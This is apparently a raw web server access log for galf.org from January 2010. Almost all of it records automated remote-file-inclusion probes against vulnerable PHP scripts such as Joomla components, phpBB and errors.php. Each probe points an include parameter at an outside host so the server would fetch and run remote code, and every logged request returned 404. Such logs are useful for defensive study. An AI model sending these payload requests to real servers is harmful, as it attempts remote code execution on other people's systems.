195.190.166.35 - - [04/Jan/2010:03:49:54 -0800] "GET /logs/access_090817.log//errors.php?error=http://www.webhosting.gr/webstats_delete/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.190.166.35 - - [04/Jan/2010:03:49:54 -0800] "GET /errors.php?error=http://www.webhosting.gr/webstats_delete/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.190.166.35 - - [04/Jan/2010:03:49:54 -0800] "GET /logs//errors.php?error=http://www.webhosting.gr/webstats_delete/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.146.200 - - [04/Jan/2010:03:49:57 -0800] "GET /logs/access_091130.log//errors.php?error=http://www.sharingpath.org/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:03:50:18 -0800] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
195.190.166.35 - - [04/Jan/2010:03:50:24 -0800] "GET /logs/access_091130.log//errors.php?error=http://www.webhosting.gr/webstats_delete/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.146.200 - - [04/Jan/2010:03:50:26 -0800] "GET /errors.php?error=http://www.sharingpath.org/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.146.200 - - [04/Jan/2010:03:50:27 -0800] "GET /logs/access.log//errors.php?error=http://www.sharingpath.org/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.146.200 - - [04/Jan/2010:03:50:27 -0800] "GET /logs//errors.php?error=http://www.sharingpath.org/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [04/Jan/2010:03:50:42 -0800] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
190.24.131.38 - - [04/Jan/2010:03:50:52 -0800] "GET /logs/access_091228.log//errors.php?error=http://www.webhosting.gr/webstats_delete/id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
190.24.131.38 - - [04/Jan/2010:03:50:52 -0800] "GET /errors.php?error=http://www.webhosting.gr/webstats_delete/id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
190.24.131.38 - - [04/Jan/2010:03:50:52 -0800] "GET /logs//errors.php?error=http://www.webhosting.gr/webstats_delete/id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:03:51:10 -0800] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
79.148.238.69 - - [04/Jan/2010:03:51:38 -0800] "GET /errors.php?error=http://militarytattoo.lu/adminv3/files/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
79.148.238.69 - - [04/Jan/2010:03:51:39 -0800] "GET /logs/access.log//errors.php?error=http://militarytattoo.lu/adminv3/files/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
79.148.238.69 - - [04/Jan/2010:03:51:40 -0800] "GET /logs//errors.php?error=http://militarytattoo.lu/adminv3/files/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [04/Jan/2010:03:53:00 -0800] "GET /logs/access_091228.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:03:53:00 -0800] "GET /logs/access_091228.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:03:53:03 -0800] "GET /logs/access_091228.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.146.200 - - [04/Jan/2010:03:53:04 -0800] "GET /logs/access_090817.log%20%20//errors.php?error=http://www.sharingpath.org/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.146.200 - - [04/Jan/2010:03:53:16 -0800] "GET /logs/access_091130.log%20%20//errors.php?error=http://www.sharingpath.org/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.190.166.35 - - [04/Jan/2010:03:53:54 -0800] "GET /logs/access.log//errors.php?error=http://www.webhosting.gr/webstats_delete/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
195.190.166.35 - - [04/Jan/2010:03:53:54 -0800] "GET /errors.php?error=http://www.webhosting.gr/webstats_delete/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
195.190.166.35 - - [04/Jan/2010:03:53:54 -0800] "GET /logs//errors.php?error=http://www.webhosting.gr/webstats_delete/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
195.190.166.35 - - [04/Jan/2010:03:54:44 -0800] "GET /logs/access_091130.log%20%20//errors.php?error=http://www.webhosting.gr/webstats_delete/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.146.200 - - [04/Jan/2010:03:54:52 -0800] "GET /errors.php?error=http://www.sharingpath.org/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.146.200 - - [04/Jan/2010:03:54:52 -0800] "GET /logs//errors.php?error=http://www.sharingpath.org/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.146.200 - - [04/Jan/2010:03:54:52 -0800] "GET /logs/access.log//errors.php?error=http://www.sharingpath.org/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
79.148.238.69 - - [04/Jan/2010:03:54:58 -0800] "GET /logs/access_090817.log//errors.php?error=http://militarytattoo.lu/adminv3/files/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.148.238.69 - - [04/Jan/2010:03:54:58 -0800] "GET /errors.php?error=http://militarytattoo.lu/adminv3/files/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.148.238.69 - - [04/Jan/2010:03:54:58 -0800] "GET /logs//errors.php?error=http://militarytattoo.lu/adminv3/files/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.171.37.206 - - [04/Jan/2010:03:55:03 -0800] "GET /logs/access.log//errors.php?error=http://www.adventuremotorcycle.org/media/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "galf.org"
213.171.37.206 - - [04/Jan/2010:03:55:04 -0800] "GET /errors.php?error=http://www.adventuremotorcycle.org/media/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "galf.org"
213.171.37.206 - - [04/Jan/2010:03:55:04 -0800] "GET /logs//errors.php?error=http://www.adventuremotorcycle.org/media/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "galf.org"
195.190.166.35 - - [04/Jan/2010:03:55:09 -0800] "GET /logs/access_090817.log%20%20//errors.php?error=http://www.webhosting.gr/webstats_delete/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.149.240.214 - - [04/Jan/2010:03:55:11 -0800] "GET /logs/access_091228.log//errors.php?error=http://www.webhosting.gr/webstats_delete/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.galf.org"
62.149.240.214 - - [04/Jan/2010:03:55:21 -0800] "GET /errors.php?error=http://www.webhosting.gr/webstats_delete/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.galf.org"
62.149.240.214 - - [04/Jan/2010:03:55:22 -0800] "GET /logs//errors.php?error=http://www.webhosting.gr/webstats_delete/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.galf.org"
195.190.166.35 - - [04/Jan/2010:03:55:43 -0800] "GET /logs/access.log//errors.php?error=http://www.webhosting.gr/webstats_delete/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
195.190.166.35 - - [04/Jan/2010:03:55:43 -0800] "GET /logs//errors.php?error=http://www.webhosting.gr/webstats_delete/id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "galf.org"
195.190.166.35 - - [04/Jan/2010:03:55:43 -0800] "GET /errors.php?error=http://www.webhosting.gr/webstats_delete/id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.146.200 - - [04/Jan/2010:03:55:53 -0800] "GET /errors.php?error=http://www.sharingpath.org/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.146.200 - - [04/Jan/2010:03:55:53 -0800] "GET /logs//errors.php?error=http://www.sharingpath.org/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.146.200 - - [04/Jan/2010:03:55:53 -0800] "GET /logs/access.log//errors.php?error=http://www.sharingpath.org/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
79.148.238.69 - - [04/Jan/2010:03:55:58 -0800] "GET /logs/access_091130.log//errors.php?error=http://militarytattoo.lu/adminv3/files/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.149.240.214 - - [04/Jan/2010:03:56:02 -0800] "GET /logs/access.log//errors.php?error=http://www.webhosting.gr/webstats_delete/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.galf.org"
213.171.37.206 - - [04/Jan/2010:03:56:32 -0800] "GET /logs/access_091228.log//errors.php?error=http://www.adventuremotorcycle.org/media/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
213.171.37.206 - - [04/Jan/2010:03:56:32 -0800] "GET /errors.php?error=http://www.adventuremotorcycle.org/media/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
213.171.37.206 - - [04/Jan/2010:03:56:32 -0800] "GET /logs//errors.php?error=http://www.adventuremotorcycle.org/media/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
89.185.231.103 - - [04/Jan/2010:03:57:11 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.185.231.103 - - [04/Jan/2010:03:57:11 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.185.231.103 - - [04/Jan/2010:03:57:12 -0800] "GET /logs/access_091012.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.185.231.103 - - [04/Jan/2010:03:57:15 -0800] "GET /logs/access_091012.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.185.231.103 - - [04/Jan/2010:03:57:15 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.185.231.103 - - [04/Jan/2010:03:57:15 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.146.200 - - [04/Jan/2010:03:58:09 -0800] "GET /errors.php?error=http://www.sharingpath.org/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.146.200 - - [04/Jan/2010:03:58:10 -0800] "GET /logs/access.log%20%20//errors.php?error=http://www.sharingpath.org/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.146.200 - - [04/Jan/2010:03:58:10 -0800] "GET /logs//errors.php?error=http://www.sharingpath.org/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
79.148.238.69 - - [04/Jan/2010:03:58:24 -0800] "GET /logs/access_090817.log%20%20//errors.php?error=http://militarytattoo.lu/adminv3/files/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.148.238.69 - - [04/Jan/2010:03:58:52 -0800] "GET /logs/access_091130.log%20%20//errors.php?error=http://militarytattoo.lu/adminv3/files/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.177.222 - - [04/Jan/2010:04:00:11 -0800] "GET /logs/access_091012.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.177.222 - - [04/Jan/2010:04:00:11 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.177.222 - - [04/Jan/2010:04:00:12 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.148.238.69 - - [04/Jan/2010:04:00:18 -0800] "GET /logs/access.log%20%20//errors.php?error=http://militarytattoo.lu/adminv3/files/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
79.148.238.69 - - [04/Jan/2010:04:00:18 -0800] "GET /errors.php?error=http://militarytattoo.lu/adminv3/files/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
79.148.238.69 - - [04/Jan/2010:04:00:19 -0800] "GET /logs//errors.php?error=http://militarytattoo.lu/adminv3/files/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
170.210.192.78 - - [04/Jan/2010:04:00:20 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.idei.by/web.idei.by/templates/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
170.210.192.78 - - [04/Jan/2010:04:00:24 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.idei.by/web.idei.by/templates/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
170.210.192.78 - - [04/Jan/2010:04:00:24 -0800] "GET /logs/access_091019.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.idei.by/web.idei.by/templates/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.62.35.55 - - [04/Jan/2010:04:00:51 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.62.35.55 - - [04/Jan/2010:04:00:51 -0800] "GET /logs/access_091123.log%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.62.35.55 - - [04/Jan/2010:04:00:51 -0800] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.62.35.55 - - [04/Jan/2010:04:01:47 -0800] "GET /logs/access_090803.log%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.62.35.55 - - [04/Jan/2010:04:01:48 -0800] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.62.35.55 - - [04/Jan/2010:04:01:48 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.62.35.55 - - [04/Jan/2010:04:01:48 -0800] "GET /logs/access_091123.log%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.62.35.55 - - [04/Jan/2010:04:02:25 -0800] "GET /logs/access_090803.log%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:04:08:10 -0800] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:04:08:10 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:04:08:10 -0800] "GET /logs/access_090914.log%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
170.210.192.78 - - [04/Jan/2010:04:08:21 -0800] "GET /PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
170.210.192.78 - - [04/Jan/2010:04:08:21 -0800] "GET /logs/access.log%20%20//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
170.210.192.78 - - [04/Jan/2010:04:08:21 -0800] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [04/Jan/2010:04:09:14 -0800] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:04:09:14 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:04:09:14 -0800] "GET /logs/access_090914.log%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:04:09:23 -0800] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:04:09:23 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:04:09:23 -0800] "GET /logs/access_090914.log%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.207.138 - - [04/Jan/2010:04:15:03 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
69.36.2.101 - - [04/Jan/2010:04:15:33 -0800] "GET /logs/access_090706.log%20%20//main.php?appserv_root=http://www.qqe.ru/forum/Themes/id1.asp?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.36.2.101 - - [04/Jan/2010:04:15:33 -0800] "GET /logs//main.php?appserv_root=http://www.qqe.ru/forum/Themes/id1.asp?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.36.2.101 - - [04/Jan/2010:04:15:33 -0800] "GET /main.php?appserv_root=http://www.qqe.ru/forum/Themes/id1.asp?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.36.2.101 - - [04/Jan/2010:04:18:53 -0800] "GET /logs/access_090706.log//main.php?appserv_root=http://www.qqe.ru/forum/Themes/id1.asp?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.58.130 - - [04/Jan/2010:04:18:59 -0800] "GET /logs/access.log//toolbar.php?dirDepth=http://www.ottoebeyer.com/tools/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.36.2.101 - - [04/Jan/2010:04:18:59 -0800] "GET /logs/access_091102.log//main.php?appserv_root=http://www.qqe.ru/forum/Themes/id1.asp?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.58.130 - - [04/Jan/2010:04:19:09 -0800] "GET /logs/access_091228.log//toolbar.php?dirDepth=http://www.ottoebeyer.com/tools/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.58.130 - - [04/Jan/2010:04:19:25 -0800] "GET /logs/access_091228.log//toolbar.php?dirDepth=http://www.ottoebeyer.com/tools/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [04/Jan/2010:04:19:38 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.perlenparadies.at/perlenparadies/zip/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.galf.org"
67.19.194.26 - - [04/Jan/2010:04:19:38 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.perlenparadies.at/perlenparadies/zip/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.galf.org"
67.19.194.26 - - [04/Jan/2010:04:21:23 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.perlenparadies.at/perlenparadies/zip/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "galf.org"
67.19.194.26 - - [04/Jan/2010:04:21:23 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.perlenparadies.at/perlenparadies/zip/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "galf.org"
216.119.103.12 - - [04/Jan/2010:04:26:59 -0800] "GET /logs/access_090914.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.aerodemo.com//mycanvas/images/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.119.103.12 - - [04/Jan/2010:04:26:59 -0800] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.aerodemo.com//mycanvas/images/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.119.103.12 - - [04/Jan/2010:04:26:59 -0800] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.aerodemo.com//mycanvas/images/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
71.250.232.26 - - [04/Jan/2010:04:28:14 -0800] "GET /logs/access_091221.log%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
71.250.232.26 - - [04/Jan/2010:04:28:15 -0800] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
71.250.232.26 - - [04/Jan/2010:04:28:15 -0800] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.185.231.103 - - [04/Jan/2010:04:30:09 -0800] "GET /logs/access_091012.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.185.231.103 - - [04/Jan/2010:04:30:09 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.185.231.103 - - [04/Jan/2010:04:30:10 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:04:30:21 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:04:30:22 -0800] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:04:30:22 -0800] "GET /logs/access_090706.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:04:30:23 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:04:30:23 -0800] "GET /logs/access_090706.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:04:30:23 -0800] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:04:30:37 -0800] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:04:30:37 -0800] "GET /logs/access_090706.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
